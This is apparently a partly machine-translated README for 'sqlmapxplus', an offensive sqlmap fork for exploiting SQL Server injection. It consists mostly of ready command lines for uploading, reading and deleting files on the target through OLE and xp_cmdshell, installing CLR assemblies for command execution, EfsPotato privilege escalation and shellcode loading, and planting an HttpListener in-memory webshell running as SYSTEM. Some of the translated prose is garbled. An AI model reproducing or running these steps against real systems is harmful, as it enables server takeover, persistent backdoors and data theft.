Dalam banyak latihan serangan dan pertahanan regional, injeksi tumpukan database SQL Server masih memiliki frekuensi peledakan lubang yang tinggi. Namun, karena beberapa batasan skenario latihan yang umum, seperti tidak adanya akses jaringan, izin rendah, pemisahan situs dan database, perlindungan terminal, kesulitan. saat online, pemeliharaan Izin rumit, dan hanya satu --os-shell yang tidak dapat lagi memenuhi kebutuhan kami.
sqlmapxplus didasarkan pada sqlmap, membuka kembali alat eksploitasi kerentanan basis data klasik, mengacu pada berbagai solusi, dan menambahkan metode pemanfaatan injeksi basis data MSSQL. Saat ini, bagian dari pengembangan kedua telah selesai, termasuk pengunggahan file ole dan fungsi pemuatan kode shell otomatis.
Petunjuk pembaruan 20240508 : Fungsi baru untuk membuka ole, fungsi baru untuk membaca file tertentu, fungsi baru untuk memindahkan file tertentu, fungsi baru untuk menyalin file tertentu, fungsi baru untuk menghapus file tertentu, fungsi baru untuk menentukan lokasi file tertentu, baru fungsi penyimpanan Fungsi kueri proses, hapus fungsi proses tersimpan baru, ubah metode unggah ole, ubah proses instalasi clr, ubah metode eksekusi perintah clr, hapus kesalahan yang disebabkan oleh komentar berbahasa Mandarin
Bertujuan untuk masalah kegagalan instalasi clr yang disebabkan oleh hilangnya transmisi dll selama proses jaringan sebenarnya (solusi sementara) Ditemukan bahwa clr dll yang digunakan dalam fungsi --install-clr asli terlalu besar, dan sejumlah besar injeksi adalah sering diperlukan dalam pertarungan sebenarnya. Jika proses injeksi Kesalahan tertentu akan menyebabkan dll gagal diimplementasikan dan dll tidak dapat berhasil dimasukkan. Proses instalasi otomatis satu klik yang asli sekarang dihapus dan dimodifikasi untuk memungkinkan pengguna menyesuaikan instalasi dll berdasarkan situasi target sebenarnya dan tambahkan sementara --check- Opsi file menentukan apakah file dll berhasil mendarat di host target. Tambahkan sementara --check-clr untuk menentukan apakah fungsi yang ditentukan pengguna berhasil dimuat basis data.
Mengapa terjadi masalah amplifikasi dll saat proses upload? Konversi ke heksadesimal lalu restorasi menyebabkan file bertambah besar. Misalnya huruf A akan diubah menjadi 41 dalam heksadesimal sehingga ukurannya menjadi dua kali lipat.
Masalah dengan penyesuaian clr (selesai) install-clr diubah sehingga memerlukan penentuan jalur clr.dll khusus. Masukkan nama kelas yang ditentukan pengguna di kotak prompt dan nama metode yang ditentukan pengguna mode clr_shell dalam mode clr_shell dimodifikasi menjadi: Fungsi yang ditentukan pengguna meneruskan parameter (selesai)
File system access: --xp-upload upload file by xp_cmdshell --ole-upload upload file by ole --check-file use xp_fileexis check file exist --ole-del delete file by ole --ole-read read file content by ole --ole-move move file by ole --ole-copy copy file by ole Operating system access: --enable-clr enable clr --disable-clr disable clr --enable-ole enable ole --check-clr check user-defined functions in the database --del-clr delete user-defined functions in the database --install-clr install clr --clr-shell clr shell --sharpshell-upload1 sharpshell upload1 --sharpshell-upload2 sharpshell upload2
tentang ole :
# 开启 ole 利用功能 python sqlmap.py -r/-u xxx --enable-ole # 通过 ole 上传文件 python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path # 通过 ole 删除指定文件 python sqlmap.py -r/-u xxx --ole-del remote_file_path # 通过 ole 阅读指定文件 python sqlmap.py -r/-u xxx --ole-read remote_file_path # 通过 ole 移动并重命名文件 python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path # 通过 ole 复制文件 python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2 # 通过 ole 实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload2
fungsi lainnya:
# 通过 xp_cmdshell 上传文件 python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path # 使用 xp_fileexis 来检查文件是否存在 python sqlmap.py -r/-u xxx --check-file remote_file_path # 查询数据库中是否存在用户自定义函数 python sqlmap.py -r/-u xxx --check-clr clr_function_name # 删除用户自定义函数 python sqlmap.py -r/-u xxx --del-clr clr_function_name # 通过 xp_cmdshell实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload1
tentang kl :
# 开启 clr 利用功能 python sqlmap.py -r/-u xxx --enable-clr # 关闭 clr 利用功能 python sqlmap.py -r/-u xxx --disable-clr # 进入 clr 安装模式 python sqlmap.py -r/-u xxx --install-clr # 进入 clr-shell 命令交互模式 python sqlmap.py -r/-u xxx --clr-shell # clr dll 参考如下,更多其他dll请参考星球获取 # 存储过程类名Xplus,存储过程函数名需要注意大小写,分别为 # ClrExec、ClrEfsPotato、ClrDownload、ClrShellcodeLoader # 对应项目目录下单独功能的dll,分别为 clrexec.dll clrefspotato.dll clrdownload.dll clrshellcodeloader.dl
Akun publik: Perang Cyber
Planet Pengetahuan: Panduan Pengujian Penetrasi
Tautan referensi untuk versi lama: https://mp.weixin.qq.com/s/nTYPKnl9XQLWhZ43sQV3xw
Tautan referensi untuk versi baru: https://mp.weixin.qq.com/s/6RpxXitEPt8rA1DFb56Oxw
https://github.com/sqlmaproject/sqlmap
https://github.com/uknowsec/SharpSQLTools
https://github.com/Anion3r/MSSQLProxy
https://mp.weixin.qq.com/s/X0cI85DdB17Wve2qzCRDbg
https://yzddmr6.com/posts/asp-net-memory-shell-httplistener/